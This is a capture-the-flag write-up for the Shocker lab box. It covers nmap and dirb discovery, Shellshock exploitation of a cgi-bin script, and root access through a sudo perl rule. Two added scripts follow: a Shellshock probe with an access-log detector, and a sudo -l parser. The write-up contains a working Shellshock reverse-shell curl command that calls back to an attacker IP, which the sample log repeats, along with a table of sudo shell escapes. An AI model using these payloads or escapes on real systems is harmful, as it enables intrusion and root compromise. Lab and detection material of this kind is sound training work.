Summary
Shocker is an easy Linux box. Initial access is through Shellshock (CVE-2014-6271), reachable via a script under Apache's cgi-bin directory. Privileges can then be escalated because the perl binary may be run as root through sudo without a password, and perl does not drop those privileges.
Discovery
Nmap discovered the following open ports and services:
nmap -sC -sV -oN fullscan -Pn 10.129.24.92
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The first thing I checked was the webserver. The user is presented with the following:
I checked the page source (Ctrl+U) but found nothing relevant, so I started a directory brute-force with the following command:
dirb http://10.129.24.92
This gave the following results:
---- Scanning URL: http://10.129.24.92/ ----
+ http://10.129.24.92/cgi-bin/ (CODE:403|SIZE:295)
+ http://10.129.24.92/index.html (CODE:200|SIZE:137)
Exploitation
The cgi-bin directory is suspicious. Scripts under it are executed by Apache's mod_cgi, which hands request headers such as User-Agent to the script as environment variables (HTTP_USER_AGENT and so on). If the script is written in bash, or invokes bash, an unpatched bash will execute commands appended to a crafted function definition stored in such a variable: this is the Shellshock vulnerability, CVE-2014-6271. Note that the bug is in bash, not in Apache; the Apache version only tells you that CGI is likely in play. The 403 only means directory listing is forbidden, so a file inside may still be executable. To exploit this you need to discover a script in this directory that you can request. To identify such a file the following command was run:
dirb http://10.129.24.92/cgi-bin/ -X .sh
---- Scanning URL: http://10.129.24.92/cgi-bin/ ----
+ http://10.129.24.92/cgi-bin/user.sh (CODE:200|SIZE:119)
With this information you can obtain a reverse shell. Start a listener on your attacking machine first (10.10.14.33 on port 9999 in this example), then issue the following request. The User-Agent value is a bash function definition followed by a command; a vulnerable bash executes that command when mod_cgi passes the header to user.sh as HTTP_USER_AGENT. The payload is a bash reverse shell over /dev/tcp, so nothing needs to be installed on the target:
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.33/9999 0>&1' http://10.129.24.92/cgi-bin/user.sh
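Before firing a reverse shell it is worth confirming the bug with a harmless probe, and afterwards a defender wants to find the same payload in the web server logs. The following Python is an added example and is not part of the original write-up: it builds a Shellshock probe that only echoes a marker string, reports whether the marker came back, and runs a simple detection over a few constructed Apache access-log lines. The marker value, the sample log lines and the URL passed to probe() are assumptions; the detection regex only looks for the "() {" function prologue, which is what every Shellshock variant starts with.

```python
import re
import urllib.request
from urllib.error import HTTPError, URLError

# Added example: benign Shellshock probe plus access-log detection.
# The marker, sample log lines and target URL are constructed for this
# example and do not come from the original write-up.

MARKER = "shellshock-probe-7f3a"


def build_probe_headers(marker=MARKER):
    """Headers carrying a harmless Shellshock test payload.

    mod_cgi exports User-Agent and Referer to the script as HTTP_USER_AGENT
    and HTTP_REFERER.  Unpatched bash treats a value beginning with '() {'
    as a function definition and runs whatever follows the closing brace,
    here an echo of the marker.  The Content-Type header and blank line are
    emitted so Apache accepts the response and the marker lands in the body.
    """
    payload = "() { :; }; echo Content-Type: text/plain; echo; /bin/echo " + marker
    return {"User-Agent": payload, "Referer": payload}


def response_indicates_vuln(body, marker=MARKER):
    """A vulnerable host echoes the marker; a patched one returns the script's normal output."""
    return marker in body


def probe(url, timeout=5.0):
    """Send the probe over the network (not exercised by the offline checks)."""
    req = urllib.request.Request(url, headers=build_probe_headers())
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read()
    except HTTPError as err:      # a 500 may still carry the marker in its body
        body = err.read()
    except URLError:
        return False
    return response_indicates_vuln(body.decode("utf-8", "replace"))


# Detection side: Apache combined-format lines quote Referer and User-Agent,
# so the '() {' prologue shows up verbatim in the log.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)')


def is_shellshock_attempt(line):
    return bool(SHELLSHOCK_RE.search(line))


def scan_access_log(lines):
    """Return (client_ip, request_path) for every line carrying a Shellshock payload."""
    hits = []
    for line in lines:
        if not is_shellshock_attempt(line):
            continue
        client_ip = line.split(" ", 1)[0]
        m = REQUEST_RE.search(line)
        hits.append((client_ip, m.group(1) if m else "?"))
    return hits


# Constructed sample log lines (not taken from the box).
SAMPLE_LOG = [
    '10.10.14.33 - - [07/Oct/2021:10:00:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 119 '
    '"-" "() { :; }; /bin/bash -i >& /dev/tcp/10.10.14.33/9999 0>&1"',
    '10.10.14.33 - - [07/Oct/2021:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 137 '
    '"-" "curl/7.74.0"',
    '10.10.14.50 - - [07/Oct/2021:10:00:03 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 500 0 '
    '"() {:;}; /usr/bin/id" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path in scan_access_log(SAMPLE_LOG):
        print("shellshock attempt from", ip, "against", path)
```

The probe is deliberately read-only: it proves code execution with an echo rather than a shell, which is what you want when documenting a finding or scanning more than one host. The log scan catches the payload whether it arrives in User-Agent, Referer or any other logged header, and whether or not the attacker put a space between the parentheses and the brace.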
The shell lands as the user shelly. Now you can go to the home directory as usual and obtain user.txt:
shelly@Shocker:/home/shelly$ pwd
/home/shelly
shelly@Shocker:/home/shelly$ cat user.txt
2ec24e11320026d1e70[...]
Privilege Escalation
To obtain root, first run sudo -l to see which commands the current user may run through sudo. This displays the following:
shelly@Shocker:/etc/selinux$ sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/etc/selinux$
If you see such entries you should always check GTFOBins (https://gtfobins.github.io) for a quick privilege escalation. Its entry for perl says the following:
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
sudo perl -e 'exec "/bin/sh";'
By executing that command you obtain a root shell:
whoami
root
cd /root
ls
root.txt
cat root.txt
52c2715605d70c761[...]
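Reading sudo -l output by eye is fine on one box, but the check is easy to script. The following Python is an added example and is not part of the original write-up: it parses the "may run the following commands" block of sudo -l output and flags any command that runs as root and whose binary has a known sudo shell escape. The sample output is constructed to mirror the shape of the one on the box, with two extra rules added for illustration, and the escape table is a small hand-picked subset of GTFOBins, not the authoritative list.

```python
import os
import re

# Added example: parse 'sudo -l' output and flag commands with a known shell
# escape.  SAMPLE_SUDO_L is constructed (two rules beyond the box's own are
# made up); SHELL_ESCAPES is a hand-picked subset of GTFOBins sudo entries.

SAMPLE_SUDO_L = r"""Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/less
    (www-data) NOPASSWD: /usr/bin/vim
"""

# sudo escape one-liners keyed by binary name (subset of https://gtfobins.github.io)
SHELL_ESCAPES = {
    "perl": "sudo perl -e 'exec \"/bin/sh\";'",
    "python3": "sudo python3 -c 'import os; os.system(\"/bin/sh\")'",
    "vim": "sudo vim -c ':!/bin/sh'",
    "less": "sudo less /etc/profile    # then type !/bin/sh",
    "find": "sudo find . -exec /bin/sh \\; -quit",
}

# "(root) NOPASSWD: /usr/bin/perl" -> runas, optional TAG: list, command
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(output):
    """Return one dict per command line in the 'may run the following commands' block."""
    rules, in_rules = [], False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD" in tags,
            "cmd": m.group("cmd").strip(),
        })
    return rules


def find_escapes(rules):
    """Rules that run as root (or ALL) and whose binary has a known shell escape."""
    found = []
    for rule in rules:
        if rule["runas"] not in ("root", "ALL"):
            continue
        binary = os.path.basename(rule["cmd"].split()[0])
        if binary in SHELL_ESCAPES:
            found.append({**rule, "escape": SHELL_ESCAPES[binary]})
    return found


if __name__ == "__main__":
    for hit in find_escapes(parse_sudo_l(SAMPLE_SUDO_L)):
        flag = "NOPASSWD" if hit["nopasswd"] else "password required"
        print(f"{hit['cmd']} ({flag}) -> {hit['escape']}")
```

Run against the sample, the perl rule is reported with NOPASSWD and less is reported as needing the user's password; the vim rule is skipped because it only grants www-data, which does not help towards root. On a real engagement, feed it the output of sudo -l and check each hit against the current GTFOBins page, since the escape syntax differs per binary and version.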